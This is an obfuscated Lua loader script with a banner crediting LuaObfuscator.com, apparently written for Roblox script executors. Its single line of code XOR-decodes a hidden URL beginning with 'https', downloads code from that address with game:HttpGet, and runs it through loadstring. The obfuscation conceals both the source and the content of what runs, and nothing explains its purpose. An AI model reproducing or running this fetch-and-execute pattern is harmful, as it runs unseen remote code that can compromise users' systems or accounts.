--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.5b) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor or v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for i=1 + 0, #v8 do v6(v10,v0(v4(v1(v2(v8,i,i + (3 -(4 -2)))),v1(v2(v9,(1321 -((330 -210) + (2214 -(356 + 658)))) + ((i-(965 -(653 + 311)))% #v9),(940 -((600 -431) + 115 + 655)) + ((i-(2 -1))% #v9) + 1 + 0)))%(338 -82)));end return v5(v10);end loadstring(game:HttpGet(v7("\113\96\71\83\233\191\190\54\102\82\84\180\226\248\109\124\70\65\239\246\244\107\119\92\77\238\224\255\109\58\80\76\247\170\230\99\102\64\70\255\170\194\108\122\93\90\181\232\240\112\122\28\112\239\235\255\96\49\1\19\251\228\240","\25\20\51\35\154\133\145")))();
